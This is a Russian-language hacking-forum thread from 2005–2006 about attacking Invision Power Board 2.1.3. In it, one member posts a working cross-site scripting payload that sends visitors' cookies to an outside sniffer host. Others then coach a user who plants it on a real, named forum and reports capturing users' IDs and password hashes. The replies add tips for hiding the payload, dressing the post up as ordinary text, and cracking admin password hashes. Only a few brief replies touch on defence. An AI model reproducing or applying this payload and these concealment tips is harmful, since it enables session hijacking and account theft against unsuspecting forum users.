Вопрос про уязвимости в IPB v2.1.3

Discussion in 'Песочница' started by Destroyer, 28 Dec 2005.

  1. Destroyer

    Destroyer New Member

    Joined:
    17 Dec 2005
    Messages:
    18
    Likes Received:
    1
    Reputations:
    0
    Не подскажите какие уязвимости присутствуют в Invision Power Board (Free Trial) v2.1.3 © 2005 а то ни где не нашёл!
     
  2. 1251soldier

    1251soldier Elder - Старейшина

    Joined:
    13 Oct 2005
    Messages:
    37
    Likes Received:
    14
    Reputations:
    -2
    HTML:
    [email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
    Ploho ishesh
     
  3. Destroyer

    Destroyer New Member

    Joined:
    17 Dec 2005
    Messages:
    18
    Likes Received:
    1
    Reputations:
    0
    Спасибо попробую
     
  4. Diablo

    Diablo Elder - Старейшина

    Joined:
    7 Nov 2005
    Messages:
    132
    Likes Received:
    34
    Reputations:
    12
    А как от этого защитится ?
     
  5. Arthas

    Arthas New Member

    Joined:
    30 Jul 2005
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    ребята, вставляю хеш и ид админа в куки (речь идет о ипб 2.1.3) но всё ровно не могу зайти под админом, хотя в ипб 1.3 всё отлично работает. в чём дело не подскажете?
     
  6. Grema

    Grema Elder - Старейшина

    Joined:
    29 Nov 2005
    Messages:
    109
    Likes Received:
    16
    Reputations:
    -4
    Потому что в 2.х в админке еще раз проверяеться пасс...
    тебе надо пасс админа а не кго куки.
    а так как это 2.х ты не разшифруеш мд5 без соли...
    разшифровывай и заходи в админку
     
  7. Barsik

    Barsik Блoxacтый

    Joined:
    16 Jan 2005
    Messages:
    267
    Likes Received:
    238
    Reputations:
    182
    Вроде выключить bb код
     
  8. muse

    muse Elder - Старейшина

    Joined:
    25 Sep 2005
    Messages:
    28
    Likes Received:
    6
    Reputations:
    6
    narod objasnite plizz soderjimoe etogo koda
    wj@wj - leviy email
    http://www.wj.com - leviy url a za4em tam `=`?
    nu dalwe vrode vse ponatno...
    pasipa
     
  9. FQziT

    FQziT Elder - Старейшина

    Joined:
    3 Nov 2005
    Messages:
    543
    Likes Received:
    156
    Reputations:
    206
    ` - это символ обратного апострофа, он является ограничителем атрибутов, но только в IE.
     
  10. maXaTTAck

    maXaTTAck New Member

    Joined:
    6 Sep 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Эти адреса не важны вообще: можешь поставить вместо их что-угодно.
     
  11. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    там в админке можно включать привязку сессии к ипу и браузеру. по умолчанию привязка только к ипу, насколько я помню.
     
  12. Kragen

    Kragen New Member

    Joined:
    3 Jan 2006
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Вот например мне нужно поместить этот код на форум:
    http://forum.la2world.ru/index.php?showtopic=3208&st=40

    Что должно быть написано в коде?

    Замест wj@wj, мой е-майл, а замест етого:
    http://www.wj.com`=`].com
    что должно быть?
     
  13. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    Эээ...да тебе вообще ничего не надо заменять :))))) тебе просто код Джордана надо фтыкнуть и все ;) а далее смотри на логе сниффера, который указал, в коде Джордана это - http://antichat.ru/sniff/log.php и ищи свои данные (только сначала удостоверься, пашет ли вообще код :))
     
  14. Kragen

    Kragen New Member

    Joined:
    3 Jan 2006
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Здесь еще одна проблема...
    Когда ставлю етот код, то в IE все норм, тоесть в сообщении ничего не отображается, НО в Opera отображается такое:
    .com'>[email protected] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`

    Можно ли ето как-нить убрать?
     
  15. Kragen

    Kragen New Member

    Joined:
    3 Jan 2006
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    З.Ы. Код нормально пашет ))
     
  16. D1mOn

    D1mOn Elder - Старейшина

    Joined:
    2 Oct 2005
    Messages:
    380
    Likes Received:
    144
    Reputations:
    29
    тока в осле работает!
     
  17. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    Если бы он работал, тогда бы это не писалось, значит маскируй цветом или размерами....
     
  18. Kragen

    Kragen New Member

    Joined:
    3 Jan 2006
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    ОК, попробую, но код пашет, т.к. в ИЕ не отображается и на снифер пришло уже 3 ИД с хешами....
    Еще вопрос... Можно-ли как-то добавить в пост с кодом, что-бы пост был не пустой, а там что-то отображалось? Я пробовал записять в начало, не получилось....
     
  19. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    Ну дак просто вставляешь скрипт, например:
    [script] а потом текст!
    и все - идет типо скрипт и текст, скрипт не видно а текст видно, мол ты просто запостил и все ;)
     
  20. Kragen

    Kragen New Member

    Joined:
    3 Jan 2006
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    =) Щас попробуем...
     
Loading...